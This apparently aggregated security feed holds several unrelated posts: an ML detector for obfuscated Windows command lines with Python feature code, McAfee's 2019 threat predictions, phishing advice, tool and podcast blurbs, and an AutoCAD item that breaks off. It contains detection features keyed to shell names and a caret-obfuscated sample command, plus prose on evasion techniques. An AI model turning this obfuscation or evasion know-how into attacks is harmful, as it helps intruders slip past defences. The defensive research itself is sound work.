While neural networks can be used with feature data, one of the attractions of this approach is that it can work with raw data (converted into numeric form) without doing any feature design or extraction. The first step in the model is converting text data into numeric form. We used a character-based encoding where each character type was encoded by a real valued number. The value was automatically derived during training and conveys semantic information about the relationships between characters as they apply to cmd.exe syntax.

Feature-Based ML

We also experimented with hand-engineered features and a Gradient Boosted Decision Tree algorithm. The features developed for this model were largely statistical in nature – derived from the presence and frequency of character sets and keywords. For example, the presence of dozens of ‘%’ characters or long, contiguous strings might contribute to detecting potential obfuscation. While any single feature will not perfectly separate the two classes, a combination of features as present in a tree-based model can learn flexible patterns in the data. The expectation is that those patterns are robust and can generalize to future obfuscation variants.

Data and Experiments

To develop our models, we collected non-obfuscated data from tens of thousands of endpoint events and generated obfuscated data using a variety of methods in Invoke-DOSfuscation. We developed our models using roughly 80 percent of the data as training data, and tested them on the remaining 20 percent. We ensured that our train-test split was stratified. For featureless ML (i.e. neural networks), we simply input Unicode code points into the first layer of the CNN model. The first layer converts the code point into semantically meaningful numerical representations (called embeddings) before feeding it into the rest of the neural network.

For the Gradient Boosted Tree method, we generated a number of features from the raw command lines. The following are some of them:

  • Length of the command line
  • The number of carets in the command line
  • The count of pipe symbols
  • The fraction of white space in the command line
  • The fraction of special characters
  • Entropy of the string
  • The frequency of the strings “cmd” and “power” in the command line

While each of these features individually is a weak signal and could not possibly be a good discriminator on its own, a flexible classifier such as a Gradient Boosted Tree – trained on sufficient data with these features – is able to classify obfuscated and non-obfuscated command lines in spite of the aforementioned difficulties.
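The feature list above and the stratified 80/20 split described earlier, as an added Python example that is not FireEye's code. The function names, the `SPECIAL_CHARS` set (the post does not define "special characters") and the sample command lines are assumptions constructed for illustration.

```python
import math
import random
from collections import Counter, defaultdict

# Assumption: the post does not define "special characters"; this set of
# cmd.exe metacharacters and punctuation is chosen here for illustration.
SPECIAL_CHARS = set("^&|%<>()!,;=\"'`@$*+~[]{}")
FEATURE_ORDER = ("length", "caret_count", "pipe_count", "whitespace_fraction",
                 "special_fraction", "entropy", "kw_cmd", "kw_power")


def shannon_entropy(text):
    """Bits per character of the string's character distribution."""
    if not text:
        return 0.0
    n = len(text)
    return sum((c / n) * math.log2(n / c) for c in Counter(text).values())


def extract_features(cmdline):
    """Map one raw command line to the statistical features listed above."""
    n = len(cmdline)
    lowered = cmdline.lower()
    return {
        "length": n,
        "caret_count": cmdline.count("^"),
        "pipe_count": cmdline.count("|"),
        "whitespace_fraction": sum(ch.isspace() for ch in cmdline) / n if n else 0.0,
        "special_fraction": sum(ch in SPECIAL_CHARS for ch in cmdline) / n if n else 0.0,
        "entropy": shannon_entropy(cmdline),
        # Literal substring counts: caret insertion (c^m^d) drives these to 0,
        # one reason no single feature separates the two classes.
        "kw_cmd": lowered.count("cmd"),
        "kw_power": lowered.count("power"),
    }


def to_matrix(cmdlines):
    """Fixed-order numeric rows, the shape a tree-based classifier expects."""
    rows = []
    for line in cmdlines:
        feats = extract_features(line)
        rows.append([feats[name] for name in FEATURE_ORDER])
    return rows


def stratified_split(labels, test_fraction=0.2, seed=0):
    """Return (train_idx, test_idx) keeping each class's share in both sets."""
    by_label = defaultdict(list)
    for i, y in enumerate(labels):
        by_label[y].append(i)
    rng = random.Random(seed)
    train, test = [], []
    for y in sorted(by_label):
        idx = by_label[y]
        rng.shuffle(idx)
        k = round(len(idx) * test_fraction)  # per-class test quota
        test.extend(idx[:k])
        train.extend(idx[k:])
    return sorted(train), sorted(test)


# Constructed samples (label 1 = obfuscated); none come from the post's data.
SAMPLES = [
    ("cmd /c echo hello", 0),
    ("c^m^d /c e^c^h^o hello", 1),
    ('powershell -NoProfile -Command "Get-Process | Sort-Object CPU"', 0),
    ("dir C:\\Windows | findstr /i system", 0),
    ("ipconfig /all", 0),
]

if __name__ == "__main__":
    for line, label in SAMPLES:
        feats = extract_features(line)
        print(label, {k: round(v, 3) for k, v in feats.items()}, line)
    # Synthetic label vector, only to show the split keeps class proportions.
    train_idx, test_idx = stratified_split([0] * 8 + [1] * 2)
    print("train:", train_idx, "test:", test_idx)
```

The rows from `to_matrix` are what a gradient boosted tree implementation would take as input; the classifier itself is left out here.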

Results

Evaluated against our test set, we were able to get nearly identical results from our Gradient Boosted Tree and neural network models.

The results for the GBT model were near perfect with metrics such as F1-score, precision, and recall all being close to 1.0. The CNN model was slightly less accurate.

While we certainly do not expect perfect results in a real-world scenario, these lab results were nonetheless encouraging. Recall that all of our obfuscated examples were generated by one source, namely the Invoke-DOSfuscation tool. While Invoke-DOSfuscation generates a wide variety of obfuscated samples, in the real world we expect to see at least some samples that are quite dissimilar from any that Invoke-DOSfuscation generates. We are currently collecting real world obfuscated command lines to get a more accurate picture of the generalizability of this model on obfuscated samples from actual malicious actors. We expect that command obfuscation, similar to PowerShell obfuscation before it, will continue to emerge in new malware families.

As an additional test we asked Daniel Bohannon (author of Invoke-DOSfuscation, the Windows command line obfuscation tool) to come up with obfuscated samples that in his experience would be difficult for a traditional obfuscation detector. In every case, our ML detector was still able to detect obfuscation. Some examples are shown in Figure 8.


Figure 8: Some examples of obfuscated text used to test and attempt to defeat the ML obfuscation detector (all were correctly identified as obfuscated text)

We also created very cryptic looking texts that, although valid Windows command lines and non-obfuscated, appear slightly obfuscated to a human observer. This was done to test efficacy of the detector with boundary examples. The detector was correctly able to classify the text as non-obfuscated in this case as well. Figure 9 shows one such example.


Figure 9: An example that appears on first glance to be obfuscated, but isn't really and would likely fool a non-ML solution (however, the ML obfuscation detector currently identifies it as non-obfuscated)

Finally, Figure 10 shows a complicated yet non-obfuscated command line that is correctly classified by our obfuscation detector, but would likely fool a non-ML detector based on statistical features (for example a rule-based detector with a hand-crafted weighting scheme and a threshold, using features such as the proportion of special characters, length of the command line or entropy of the command line).


Figure 10: An example that would likely be misclassified by an ML detector that uses simplistic statistical features; however, our ML obfuscation detector currently identifies it as non-obfuscated

CNN vs. GBT Results

We compared the results of a heavily tuned GBT classifier built using carefully selected features to those of a CNN trained with raw data (featureless ML). While the CNN architecture was not heavily tuned, it is interesting to note that with samples such as those in Figure 10, the GBT classifier confidently predicted non-obfuscated with a score of 19.7 percent (the complement of the measure of the classifier’s confidence in non-obfuscation). Meanwhile, the CNN classifier predicted non-obfuscated with a confidence probability of 50 percent – right at the boundary between obfuscated and non-obfuscated. The number of misclassifications of the CNN model was also more than that of the Gradient Boosted Tree model. Both of these are most likely the result of inadequate tuning of the CNN, and not a fundamental shortcoming of the featureless approach.

Conclusion

In this blog post we described an ML approach to detecting obfuscated Windows command lines, which can be used as a signal to help identify malicious command line usage. Using ML techniques, we demonstrated a highly accurate mechanism for detecting such command lines without resorting to the often inadequate and costly technique of maintaining complex if-then rules and regular expressions. The more comprehensive ML approach is flexible enough to catch new variations in obfuscation, and when gaps are detected, it can usually be handled by adding some well-chosen evader samples to the training set and retraining the model.

This successful application of ML is yet another demonstration of the usefulness of ML in replacing complex manual or programmatic approaches to problems in computer security. In the years to come, we anticipate ML to take an increasingly important role both at FireEye and in the rest of the cyber security industry.

McAfee Labs 2019 Threats Predictions Report

These predictions were written by Eoin Carroll, Taylor Dunton, John Fokker, German Lancioni, Lee Munson, Yukihiro Okutomi, Thomas Roccia, Raj Samani, Sekhar Sarukkai, Dan Sommer, and Carl Woodward.

As 2018 draws to a close, we should perhaps be grateful that the year has not been entirely dominated by ransomware, although the rise of the GandCrab and SamSam variants shows that the threat remains active. Our predictions for 2019 move away from simply providing an assessment on the rise or fall of a particular threat, and instead focus on current rumblings we see in the cybercriminal underground that we expect to grow into trends and subsequently threats in the wild.

We have witnessed greater collaboration among cybercriminals exploiting the underground market, which has allowed them to develop efficiencies in their products. Cybercriminals have been partnering in this way for years; in 2019 this market economy will only expand. The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before.

Social media has been a part of our lives for more than a decade. Recently, nation-states have infamously used social media platforms to spread misinformation. In 2019, we expect criminals to begin leveraging those tactics for their own gain. Equally, the continued growth of the Internet of Things in the home will inspire criminals to target those devices for monetary gain.

One thing is certain: Our dependency on technology has become ubiquitous. Consider the breaches of identity platforms, with reports of 50 million users being affected. It is no longer the case that a breach is limited to that platform. Everything is connected, and you are only as strong as your weakest link. In the future, we face the question of which of our weakest links will be compromised.

—Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research

Twitter @Raj_Samani

Predictions

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Artificial Intelligence the Future of Evasion Techniques

Synergistic Threats Will Multiply, Requiring Combined Responses

Misinformation, Extortion Attempts to Challenge Organizations’ Brands

Data Exfiltration Attacks to Target the Cloud

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Hidden hacker forums and chat groups serve as a market for cybercriminals, who can buy malware, exploits, botnets, and other shady services. With these off-the-shelf products, criminals of varying experience and sophistication can easily launch attacks. In 2019, we predict the underground will consolidate, creating fewer but stronger malware-as-a-service families that will actively work together. These increasingly powerful brands will drive more sophisticated cryptocurrency mining, rapid exploitation of new vulnerabilities, and increases in mobile malware and stolen credit cards and credentials.

We expect more affiliates to join the biggest families, due to the ease of operation and strategic alliances with other essential top-level services, including exploit kits, crypter services, Bitcoin mixers, and counter-antimalware services. Two years ago, we saw many of the largest ransomware families, for example, employ affiliate structures. We still see numerous types of ransomware pop up, but only a few survive because most cannot attract enough business to compete with the strong brands, which offer higher infection rates as well as operational and financial security. At the moment the largest families actively advertise their goods; business is flourishing because they are strong brands (see GandCrab) allied with other top-level services, such as money laundering or making malware undetectable.

Underground businesses function successfully because they are part of a trust-based system. This may not be a case of “honor among thieves,” yet criminals appear to feel safe, trusting they cannot be touched in the inner circle of their forums. We have seen this trust in the past, for example, with the popular credit card shops in the first decade of the century, which were a leading source of cybercrime until major police action broke the trust model.

As endpoint detection grows stronger, the vulnerable remote desktop protocol (RDP) offers another path for cybercriminals. In 2019 we predict malware, specifically ransomware, will increasingly use RDP as an entry point for an infection. Currently, most underground shops advertise RDP access for purposes other than ransomware, typically using it as a stepping stone to gain access to Amazon accounts or as a proxy to steal credit cards. Targeted ransomware groups and ransomware-as-a-service (RaaS) models will take advantage of RDP, and we have seen highly successful under-the-radar schemes use this tactic. Attackers find a system with weak RDP, attack it with ransomware, and propagate through networks either living off the land or using worm functionality (EternalBlue). There is evidence that the author of GandCrab is already working on an RDP option.

We also expect malware related to cryptocurrency mining will become more sophisticated, selecting which currency to mine on a victim’s machine based on the processing hardware (WebCobra) and the value of a specific currency at a given time.

Next year, we predict the length of a vulnerability’s life, from detection to weaponization, will grow even shorter. We have noticed a trend of cybercriminals becoming more agile in their development process. They gather data on flaws from online forums and the Common Vulnerabilities and Exposures database to add to their malware. We predict that criminals will sometimes take a day or only hours to implement attacks against the latest weaknesses in software and hardware.

We expect to see an increase in underground discussions on mobile malware, mostly focused on Android, regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security. The value of exploiting the mobile platform is currently underestimated as phones offer a lot to cybercriminals given the amount of access they have to sensitive information such as bank accounts.

Credit card fraud and the demand for stolen credit card details will continue, with an increased focus on online skimming operations that target third-party payment platforms on large e-commerce sites. From these sites, criminals can silently steal thousands of fresh credit card details at a time. Furthermore, social media is being used to recruit unwitting users, who might not know they are working for criminals when they reship goods or provide financial services.

We predict an increase in the market for stolen credentials—fueled by recent large data breaches and by bad password habits of users. The breaches lead, for example, to the sale of voter records and email-account hacking. These attacks occur daily.

Artificial Intelligence the Future of Evasion Techniques

To increase their chances of success, attackers have long employed evasion techniques to bypass security measures and avoid detection and analysis. Packers, crypters, and other tools are common components of attackers’ arsenals. In fact, an entire underground economy has emerged, offering products and dedicated services to aid criminal activities. We predict in 2019, due to the ease with which criminals can now outsource key components of their attacks, evasion techniques will become more agile due to the application of artificial intelligence. Think the counter-AV industry is pervasive now? This is just the beginning.

In 2018 we saw new process-injection techniques such as “process doppelgänging” with the SynAck ransomware, and PROPagate injection delivered by the RIG exploit kit. By adding technologies such as artificial intelligence, evasion techniques will be able to further circumvent protections.

Different evasions for different malware

In 2018, we observed the emergence of new threats such as cryptocurrency miners, which hijack the resources of infected machines. With each threat comes inventive evasion techniques:

  • Cryptocurrency mining: Miners implement a number of evasion techniques. Minerva Labs discovered WaterMiner, which simply stops its mining process when the victim runs the Task Manager or an antimalware scan.
  • Exploit kits: Popular evasion techniques include process injection or the manipulation of memory space and adding arbitrary code. In-memory injection is a popular infection vector for avoiding detection during delivery.
  • Botnets: Code obfuscation or anti-disassembling techniques are often used by large botnets that infect thousands of victims. In May 2018, AdvisorsBot was discovered using junk code, fake conditional instructions, XOR encryption, and even API hashing. Because bots tend to spread widely, the authors implemented many evasion techniques to slow reverse engineering. They also used obfuscation mechanisms for communications between the bots and control servers. Criminals use botnets for activities such as DDoS for hire, proxies, spam, or other malware delivery. Using evasion techniques is critical for criminals to avoid or delay botnet takedowns.
  • Advanced persistent threats: Stolen certificates bought on the cybercriminal underground are often used in targeted attacks to bypass antimalware detection. Attackers also use low-level malware such as rootkits or firmware-based threats. For example, in 2018 ESET discovered the first UEFI rootkit, LoJax. Security researchers have also seen destructive features used as anti-forensic techniques: The OlympicDestroyer malware targeted the Olympic Games organization and erased event logs and backups to avoid investigation.

Artificial intelligence the next weapon

In recent years, we have seen malware using evasion techniques to bypass machine learning engines. For example, in 2017 the Cerber ransomware dropped legitimate files on systems to trick the engine that classifies files. In 2018, PyLocky ransomware used InnoSetup to package the malware and avoid machine learning detection.

Clearly, bypassing artificial intelligence engines is already on the criminal to-do list; however, criminals can also implement artificial intelligence in their malicious software. We expect evasion techniques to begin leveraging artificial intelligence to automate target selection, or to check infected environments before deploying later stages, in order to avoid detection.

Such implementation is game changing in the threat landscape. We predict it will soon be found in the wild.

Synergistic Threats Will Multiply, Requiring Combined Responses

This year we have seen cyber threats adapt and pivot faster than ever. We have seen ransomware evolving to be more effective or operate as a smoke screen. We have seen cryptojacking soar, as it provides a better, and safer, return on investment than ransomware. We can still see phishing going strong and finding new vulnerabilities to exploit. We also noticed fileless and “living off the land” threats are more slippery and evasive than ever, and we have even seen the incubation of steganography malware in the Pyeongchang Olympics campaign. In 2019, we predict attackers will more frequently combine these tactics to create multifaceted, or synergistic, threats.

What could be worse?

Attacks are usually centered on the use of one threat. Bad actors concentrate their efforts on iterating and evolving one threat at a time for effectiveness and evasion. When an attack is successful, it is classified as ransomware, cryptojacking, data exfiltration, etc., and defenses are put in place. At this point, the attack’s success rate is significantly reduced. However, if a sophisticated attack involves not one but five top-notch threats synergistically working together, the defense panorama could become very blurry. The challenge arises when an attempt is made to identify and mitigate the attack. Because the ultimate attack goals are unknown, one might get lost in the details of each threat as it plays a role in the chain.

One of the reasons synergic threats are becoming a reality is that bad actors are improving their skills by developing foundations, kits, and reusable threat components. As attackers organize their efforts into a black-market business model, they can focus on adding value to previous building blocks. This strategy allows them to orchestrate multiple threats instead of just one to reach their goals.

An example is worth a thousand words

Imagine an attack that starts with a phishing threat—not a typical campaign using Word documents, but a novel technique. This phishing email contains a video attachment. When you open the video, your video player does not play and prompts you to update the codec. Once you run the update, a steganographic polyglot file (a simple GIF) is deployed on your system. Because it is a polyglot (a file that conforms to more than one format at the same time), the GIF file schedules a task that fetches a fileless script hosted on a compromised system. That script running in memory evaluates your system and decides to run either ransomware or a cryptocurrency miner. That is a dangerous synergistic threat in action.

The attack raises many questions: What are you dealing with? Is it phishing 2.0? Is it stegware? Is it fileless and “living off the land”? Cryptojacking? Ransomware? It is everything at the same time.

This sophisticated but feasible example demonstrates that focusing on one threat may not be enough to detect or remediate an attack. When you aim to classify the attack into a single category, you might lose the big picture and thus be less effective at mitigating it. Even if you stop the attack in the middle of the chain, discovering the initial and final stages is just as important for protecting against future attempts.

Be curious, be creative, connect your defenses

Tackling sophisticated attacks based on synergic threats requires questioning every threat. What if this ransomware hit was part of something bigger? What if this phishing email pivots to a technique that employees are not trained for? What if we are missing the real goal of the attack?

Bearing these questions in mind will not only help capture the big picture, but also get the most out of security solutions. We predict bad actors will add synergy to their attacks, but cyber defenses can also work synergistically.

Cybercriminals to Use Social Media Misinformation, Extortion Campaigns to Challenge Organizations’ Brands

The elections were influenced, fake news prevails, and our social media followers are all foreign government–controlled bots. At least that’s how the world feels sometimes. To say recent years have been troubled for social media companies would be an understatement. During this period a game of cat and mouse has ensued, as automated accounts are taken down, adversaries’ tactics evolve, and botnet accounts emerge looking more legitimate than ever before. In 2019, we predict an increase of misinformation and extortion campaigns via social media that will focus on brands and originate not from nation-state actors but from criminal groups.

Nation-states leverage bot battalions to deliver messages or manipulate opinion, and their effectiveness is striking. Bots often will take both sides of a story to spur debate, and this tactic works. By employing a system of amplifying nodes, as well as testing the messaging (including hashtags) to determine success rates, botnet operators demonstrate a real understanding of how to mold popular opinion on critical issues.

In one example, an account that was only two weeks old with 279 followers, most of which were other bots, began a harassment campaign against an organization. By amplification, the account generated an additional 1,500 followers in only four weeks by simply tweeting malicious content about their target.

Activities to manipulate public opinion have been well documented, and bots well versed in manipulating conversations to drive agendas stand ready. Next year we expect that cybercriminals will repurpose these campaigns to extort companies by threatening to damage their brands. Organizations face a serious danger.

Data Exfiltration Attacks to Target the Cloud

In the past two years, enterprises have widely adopted the Software-as-a-Service model, such as Office 365, as well as Infrastructure- and Platform-as-a-Service cloud models, such as AWS and Azure. With this move, far more corporate data now resides in the cloud. In 2019, we expect a significant increase in attacks that follow the data to the cloud.

With the increased adoption of Office 365, we have noticed a surge of attacks on the service—especially attempts to compromise email. One threat the McAfee cloud team uncovered was the botnet KnockKnock, which targeted system accounts that typically do not have multifactor authentication. We have also seen the emergence of exploits of the trust model in the Open Authorization standard. One was launched by Fancy Bear, the Russian cyber espionage group, phishing users with a fake Google security app to gain access to user data.

Similarly, during the last couple of years we have seen many high-profile data breaches attributed to misconfigured Amazon S3 buckets. This is clearly not the fault of AWS. Based on the shared responsibility model, the customer is on the hook to properly configure IaaS/PaaS infrastructure and properly protect their enterprise data and user access. Complicating matters, many of these misconfigured buckets are owned by vendors in their supply chains, rather than by the target enterprises. With access to thousands of open buckets and credentials, bad actors are increasingly opting for these easy pickings.

McAfee has found that 21% of data in the cloud is sensitive—such as intellectual property, and customer and personal data—according to the McAfee Cloud Adoption and Risk Report. With a 33% increase in users collaborating on this data during the past year, cybercriminals know how to seek more targets:

  • Cloud-native attacks targeting weak APIs or ungoverned API endpoints to gain access to the data in SaaS as well as in PaaS and serverless workloads
  • Expanded reconnaissance and exfiltration of data in cloud databases (PaaS or custom applications deployed in IaaS) expanding the S3 exfiltration vector to structured data in databases or data lakes
  • Leveraging the cloud as a springboard for cloud-native man-in-the-middle attacks (such as GhostWriter, which exploits publicly writable S3 buckets introduced due to customer misconfigurations) to launch cryptojacking or ransomware attacks into other variants of MITM attacks.

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

As tech fans continue to fill their homes with smart gadgets, from plugs to TVs, coffee makers to refrigerators, and motion sensors to lighting, the means of gaining entry to a home network are growing rapidly, especially given how poorly secured many IoT devices remain.

But the real key to the network door next year will be the voice-controlled digital assistant, a device created in part to manage all the IoT devices within a home. As sales increase—and an explosion in adoption over the holiday season looks likely—the attraction for cybercriminals to use assistants to jump to the really interesting devices on a network will only continue to grow.

For now, the voice assistant market is still taking shape, with many brands still looking to dominate the market, in more ways than one, and it is unclear whether one device will become ubiquitous. If one does take the lead, its security features will quite rightly fall under the microscope of the media, though not perhaps before its privacy concerns have been fully examined in prose.

(Last year we highlighted privacy as the key concern for home IoT devices. Privacy will continue to be a concern, but cybercriminals will put more effort into building botnets, demanding ransoms, and threatening the destruction of property of both homes and businesses).

This opportunity to control a home’s or office’s devices will not go unnoticed by cybercriminals, who will engage in an altogether different type of writing in relation to the market winner, in the form of malicious code designed to attack not only IoT devices but also the digital assistants that are given so much license to talk to them.

Smartphones have already served as the door to a threat. In 2019, they may well become the picklock that opens a much larger door. We have already seen two threats that demonstrate what cybercriminals can do with unprotected devices, in the form of the Mirai botnet, which first struck in 2016, and IoT Reaper, in 2017. These IoT malware appeared in many variants to attack connected devices such as routers, network video recorders, and IP cameras. They expanded their reach by password cracking and exploiting known vulnerabilities to build worldwide robot networks.

Next year we expect to see two main vectors for attacking home IoT devices: routers and smartphones/tablets. The Mirai botnet demonstrated the lack of security in routers. Infected smartphones, which can already monitor and control home devices, will become one of the top targets of cybercriminals, who will employ current and new techniques to take control.

Malware authors will take advantage of phones and tablets, those already trusted controllers, to try to take over IoT devices by password cracking and exploiting vulnerabilities. These attacks will not appear suspicious because the network traffic comes from a trusted device. The success rate of attacks will increase, and the attack routes will be difficult to identify. An infected smartphone could cause the next example of hijacking the DNS settings on a router. Vulnerabilities in mobile and cloud apps are also ripe for exploitation, with smartphones at the core of the criminals’ strategy.

Infected IoT devices will supply botnets, which can launch DDoS attacks, as well as steal personal data. The more sophisticated IoT malware will exploit voice-controlled digital assistants to hide its suspicious activities from users and home-network security software. Malicious activities such as opening doors and connecting to control servers could be triggered by user voice commands (“Play music” and “What is today’s weather?”). Soon we may hear infected IoT devices themselves exclaiming: “Assistant! Open the back door!”

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Large-scale data breaches of identity platforms—which offer centralized secure authentication and authorization of users, devices, and services across IT environments—have been well documented in 2018. Meanwhile, the captured data is being reused to cause further misery for its victims. In 2019, we expect to see large-scale social media platforms implement additional measures to protect customer information. However, as the platforms grow in numbers, we predict criminals will further focus their resources on such attractive, data-rich environments. The struggle between criminals and big-scale platforms will be the next big battleground.

Triton, malware that attacks industrial control systems (ICS), has demonstrated the capabilities of adversaries to remotely target manufacturing environments through their adjacent IT environments. Identity platform and “edge device” breaches will provide the keys to adversaries to launch future remote ICS attacks due to static password use across environments and constrained edge devices, which lack secure system requirements due to design limitations. (An edge device is any network-enabled system hardware or protocol within an IoT product.) We expect multifactor authentication and identity intelligence will become the best methods to provide security in this escalating battle. We also predict identity intelligence will complement multifactor authentication to strengthen the capabilities of identity platforms.

Identity is a fundamental component in securing IoT. In these ecosystems, devices and services must securely identify trusted devices so that they can ignore the rest. The identity model has shifted from user centric in traditional IT systems to machine centric for IoT systems. Unfortunately, due to the integration of operational technology and insecure “edge device” design, the IoT trust model is built on a weak foundation of assumed trust and perimeter-based security.

At Black Hat USA and DEF CON 2018, 30 talks discussed IoT edge device exploitation. That’s a large increase from just 19 talks on the topic in 2017. The increase in interest was primarily in relation to ICS, consumer, medical, and “smart city” verticals. (See Figure 1.) Smart edge devices, combined with high-speed connectivity, are enabling IoT ecosystems, but the rate at which they are advancing is compromising the security of these systems.

Figure 1: The number of conference sessions on the security of IoT devices has increased, matching the growing threat to poorly protected devices. 

Most IoT edge devices provide no self-defense (isolating critical functions, memory protection, firmware protection, least privileges, or security by default) so one successful exploit owns the device. IoT edge devices also suffer from “break once, run everywhere” attacks—due to insecure components used across many device types and verticals. (See articles on WingOS and reverse engineering.)

McAfee Advanced Threat Research team engineers have demonstrated how medical device protocols can be exploited to endanger human life and compromise patients’ privacy due to assumed trust. These examples illustrate just a few of many possible scenarios that lead us to believe adversaries will choose IoT edge devices as the path of least resistance to achieve their objectives. Servers have been hardened over the last decade, but IoT hardware is far behind. By understanding an adversary’s motives and opportunities (attack surface and access capability), we can define a set of security requirements independent of a specific attack vector.

Figure 2 gives a breakdown of the types of vulnerabilities in IoT edge devices, highlighting weak points to address by building identity and integrity capabilities into edge hardware to ensure these devices can deflect attacks.

Figure 2: Insecure protocols are the primary attack surface in IoT edge devices.

IoT security must begin on the edge with a zero-trust model and provide a hardware root of trust as the core building block for protecting against hack and shack attacks and other threats. McAfee predicts an increase in compromises on identity platforms and IoT edge devices in 2019 due to the adoption of smart cities and increased ICS activity.

The post McAfee Labs 2019 Threats Predictions Report appeared first on McAfee Blogs.

HideIPVPN review: Great if you need a speedy connection via Germany

HideIPVPN in brief:

  • P2P allowed: Yes, on select servers
  • Business location: USA and Moldova
  • Number of servers: 29
  • Number of country locations: 11
  • Cost: $70 (billed annually)
  • VPN protocol: OpenVPN
  • Data encryption: AES-256
  • Data authentication: SHA 256
  • Handshake encryption: RSA 2048

Editor’s Note: This review was updated on November 7, 2018 to reflect changes to the HideIPVPN desktop app for Windows, improved speed scores, and a change to the review score.


Malcom – Malware Communication Analyzer

Malcom is a Malware Communication Analyzer designed to analyze a system’s network communication using graphical representations of network traffic, and cross-reference them with known malware sources.

This comes in handy when analyzing how certain malware species try to communicate with the outside world.

Malcom Malware Communication Analyzer Features

Malcom can help you:

  • Detect central command and control (C&C) servers
  • Understand peer-to-peer networks
  • Observe DNS fast-flux infrastructures
  • Quickly determine if a network artifact is ‘known-bad’

The aim of Malcom is to make malware analysis and intel gathering faster by providing a human-readable version of network traffic originating from a given host or network.

Read the rest of Malcom – Malware Communication Analyzer now! Only available at Darknet.

The Spotify Phishing Scam: How to Reel in This Cyberthreat

Many music-lovers around the world use Spotify to stream all of their favorite tunes. While the music streaming platform is a convenient tool for users to download and listen to their music, hackers are capitalizing on the company’s popularity with a recent phishing campaign. The campaign lures users into giving up their account details, putting innocent Spotify customers’ credentials at risk.

So, how are the account hijackers conducting these phishing attacks? The campaign sends listeners fraudulent emails that appear to be from Spotify, prompting them to confirm their account details. However, the link contained in the email is actually a phishing link. When the user clicks on it, they are redirected to a phony Spotify website where they are prompted to enter their username and password for the hacker’s disposal.

This phishing campaign can lead to a variety of other security risks for victims exposed to the threat. For example, many users include their birthday or other personal information in their password to make it easier to remember. If a hacker gains access to a user’s Spotify password, they are given a glance into the victim’s password creation mindset, which could help them breach other accounts belonging to the user.

Fortunately, there are multiple steps users can take to avoid the Spotify phishing campaign and threats like it. Check out the following tips:

  • Create complex passwords. If a hacker gains access to a victim’s username and password, they will probably analyze these credentials to determine how the victim creates their passwords. It’s best to create passwords that don’t include personal information, such as your birthday or the name of your pet.
  • Avoid reusing passwords. If victims reuse the same password for multiple accounts, this attack could allow cybercriminals to breach additional services and platforms. To prevent hackers from accessing other accounts, create unique usernames and passwords for each online platform you use.
  • Look out for phishing red flags. If you notice that the “from” address in an email is a little sketchy or an unknown source, don’t interact with the message. And if you’re still unsure of whether the email is legitimate or not, hover your mouse over the button prompting you to click on the link (but don’t actually click on it). If the URL preview doesn’t seem to be related to the company, it is most likely a phishing email.
  • Be skeptical of emails claiming to come from legitimate companies. If you receive an email asking to confirm your login credentials, go directly to the company’s website. You should be able to check the status of your account on the company website or under the settings portion of the Spotify app to determine the legitimacy of the request.
  • Use security software to surf the web safely. Make sure you use a website reputation tool like McAfee WebAdvisor to avoid landing on phishing and malicious sites.

And, as always, to stay on top of the latest and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The Spotify Phishing Scam: How to Reel in This Cyberthreat appeared first on McAfee Blogs.

Understanding & Preventing Advanced Persistent Threats (APTs)

A guide to advanced persistent threats (APTs), a highly sophisticated, highly destructive form of cyber attack. What is an Advanced Persistent Threat (APT)? “Advanced persistent threat” is a broad term used to describe a cyber attack where hackers covertly gain access to a system and remain inside it, undetected, for a significant period of time…

The post Understanding & Preventing Advanced Persistent Threats (APTs) appeared first on .

AutoCAD Malware – Computer Aided Theft

Computer aided design (CAD) has played a vital role in the past decades building our technology-driven society, helping structures and engineering reach new levels of complexity – designing a building such as the Burj Khalifa by hand would be difficult if not impossible.

Of course, where valuable documents are stored electronically, malware is typically never far behind and,

Risky Business #522 — Alex Stamos co-hosts the show, reflects on Snowden disclosures

We’ve got a slightly different edition of the show this week – Alex Stamos is filling in for Adam Boileau this week in the news slot.

Most of you know him as Facebook’s recently departed chief security officer. Alex also served as the CSO at Yahoo for a time, but his security career stretches back a long way. He co-founded iSEC Partners back in 2004, and before that he did some time with @Stake.

The @Stake mafia is everywhere.

These days Alex is an adjunct professor at Stanford University. He joined me to talk about the week’s security news, as well as to have a chat about the Edward Snowden disclosures, five years on.

This week’s show is brought to you by Thinkst Canary, big thanks to them for that. And instead of one of their staff being on the show this week in the sponsor chair, they asked me to interview this week’s sponsor guest, their customer, Mike Ruth, a security engineer with Cruise Automation.

Mike did a presentation at a conference called QCon recently all about automating the deployment of canary tokens at scale using some nifty CI/CD tricks. He’ll be joining us after the news to tell us all about that.

Items discussed in this week’s news:

  • NSO Group busted selling to Saudi Arabia
  • NSO malware targets Mexican journalists
  • Edward Snowden claims NSO connection in Khashoggi case
  • Australia’s AA Bill latest
  • npm supply-chain attack targets Bitcoiners
  • Guardian reports Manafort met Assange, denials, lawsuits flying already
  • UK parliament seizes Facebook documents
  • Uber fined over 2016 breach coverup
  • UK cops decline to charge bug reporter
  • USPS finally fixes data exposure after Krebs intervention
  • Rowhammer attack bypasses ECC protections
  • Bloomberg is investigating its own reporting on Supermicro
  • Magecart is everywhere
  • Google, Mozilla plan browser access to file systems

Links to everything that we discussed are below and you can follow Patrick or Alex on Twitter if that’s your thing.

Show notes

Israeli hacking firm NSO Group offered Saudis cellphone spy tools - report | The Times of Israel
Edward Snowden: Israeli spyware was used to track and eventually kill Jamal Khashoggi | Business Insider
A Journalist Was Killed in Mexico. Then His Colleagues Were Hacked. - The New York Times
Home Affairs attempts to allay concerns about Australian exporters for encryption-busting Bill | ZDNet
Widely used open source software contained bitcoin-stealing backdoor | Ars Technica
I don't know what to say. · Issue #116 · dominictarr/event-stream · GitHub
Manafort held secret talks with Assange in Ecuadorian embassy, sources say | US news | The Guardian
UK parliament seizes cache of internal Facebook documents to further privacy probe | TechCrunch
Uber fined $1.17 million by U.K., Dutch authorities for 2016 breach
UK cops won't go after researcher who reported security issue to York city officials | ZDNet
USPS Site Exposed Data on 60 Million Users — Krebs on Security
